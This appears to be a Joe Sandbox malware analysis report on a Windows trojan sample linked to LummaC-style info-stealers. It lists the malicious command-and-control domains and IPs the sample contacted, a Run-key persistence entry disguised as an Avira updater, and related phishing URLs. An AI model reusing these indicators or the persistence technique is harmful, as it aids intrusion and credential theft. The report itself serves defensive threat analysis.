                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/;SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/about/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://steamcommunity.com/my/wishlist/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://reinforcenh.shop:443/apiSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BDE000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://help.steampowered.com/en/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/market/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/news/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://store.steampowered.com/subscriber_agreement/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://reinforcenh.shop/apiiUSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://offensivedzvju.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://vozmeatillu.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://steamcommunity.com/discussions/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://piriform.com/go/app_cc_privacy_policySecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/stats/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://medal.tvSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/steam_refunds/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://reinforcenh.shop/7SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BC3000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://ballotnwu.site/cPSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/workshop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/legal/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ballotnwu.site/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ghostreedmnu.shop/fSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.21.4.136
                                		gutterydhowi.shopUnited States
                                		13335CLOUDFLARENETUStrue
                                188.114.97.3
                                		fragnantbui.shopEuropean Union
                                		13335CLOUDFLARENETUStrue
                                172.67.162.108
                                		drawzhotdog.shopUnited States
                                		13335CLOUDFLARENETUStrue
                                172.67.128.144
                                		ballotnwu.siteUnited States
                                		13335CLOUDFLARENETUStrue
                                188.114.96.3
                                		stogeneratmns.shopEuropean Union
                                		13335CLOUDFLARENETUStrue
                                104.102.49.254
                                		steamcommunity.comUnited States
                                		16625AKAMAI-ASUSfalse
                                172.67.208.139
                                		reinforcenh.shopUnited States
                                		13335CLOUDFLARENETUStrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1519702
                                Start date and time:2024-09-26 21:25:07 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@3/1@10/7
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 53%
                                • Number of executed functions: 214
                                • Number of non-executed functions: 16
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:26:16API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe modified
                                20:26:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OculusAvira C:\Users\user\Music\AviraUpdater\AviraOculus.exe
                                20:26:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OculusAvira C:\Users\user\Music\AviraUpdater\AviraOculus.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.21.4.136file.exeGet hashmaliciousLummaCBrowse
                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                      a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                    188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                    • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • filetransfer.io/data-package/Ky4pZ0WB/download
                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • www.1win-moldovia.fun/1g7m/
                                                    http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                    • www.tiktok758.com/img/logo.4c830710.svg
                                                    TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                    • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                                    PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.rtprajalojago.live/2wnz/
                                                    (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                                    • dddotx.shop/Mine/PWS/fre.php
                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • filetransfer.io/data-package/DiF66Hbf/download
                                                    http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • easyantrim.pages.dev/id.html
                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • filetransfer.io/data-package/13rSMZZi/download
                                                    172.67.162.108file.exeGet hashmaliciousLummaCBrowse
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                      SecuriteInfo.com.Win32.PWSX-gen.716.1862.exeGet hashmaliciousLummaCBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        offensivedzvju.shopfile.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 188.114.97.3
                                                                        3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.97.3
                                                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 188.114.96.3
                                                                        gutterydhowi.shopfile.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.4.136
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.132.32
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 104.21.4.136
                                                                        3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.4.136
                                                                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.4.136
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.132.32
                                                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.132.32
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.132.32
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 104.21.4.136
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 172.67.132.32
                                                                        steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.102.49.254
                                                                        3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.102.49.254
                                                                        Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.102.49.254
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 104.102.49.254
                                                                        fragnantbui.shopfile.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 188.114.96.3
                                                                        3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.97.3
                                                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                        • 188.114.96.3

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSCLQD.htmGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.25.14
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.208.139
                                                                        https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 104.26.4.39
                                                                        https://solvetherecaptcha404.webflow.io/404Get hashmaliciousUnknownBrowse
                                                                        • 104.18.160.117
                                                                        Daniel Leblanc shared _Incendie Hudson._ with you. #12.emlGet hashmaliciousUnknownBrowse
                                                                        • 104.16.117.116
                                                                        https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.177.128
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.208.139
                                                                        http://egynte.com/Get hashmaliciousUnknownBrowse
                                                                        • 1.1.1.1
                                                                        https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFl1bBkz1ufgENuAZF1ODXRkOEXcot-2BlieaBFtd0IhXM08Jp__OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOxzyaiykDuoFljiX91jkOGF7TGq8s59HY1LfNpqOHr1hEZu4XswpdGfGTbIsw4Mg7Ewx-2FAzTwbYOEI5c5W9xQE63UMPeYSBL2GJwQizVTVETCyjhoaIq4ot5vl7L-2BMO3KbJCX7vVUyT6NGOFhbY99Ap0lxFmjxSsCRRr7CrNGrevXE9jp8IJyovKPHHX6-2FxnVR-2BVdKd5S1Zkq94QkyDWCs9lCPSQ3LNxOSscF1edS7fTz6-2Bswo-2FZW2dAOCyCTKBxs-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.130.49
                                                                        CLOUDFLARENETUSCLQD.htmGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.25.14
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 172.67.208.139
                                                                        https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 104.26.4.39
                                                                        https://solvetherecaptcha404.webflow.io/404Get hashmaliciousUnknownBrowse
                                                                        • 104.18.160.117
                                                                        Daniel Leblanc shared _Incendie Hudson._ with you. #12.emlGet hashmaliciousUnknownBrowse
                                                                        • 104.16.117.116
                                                                        https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.177.128
                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 172.67.208.139
                                                                        http://egynte.com/Get hashmaliciousUnknownBrowse
                                                                        • 1.1.1.1
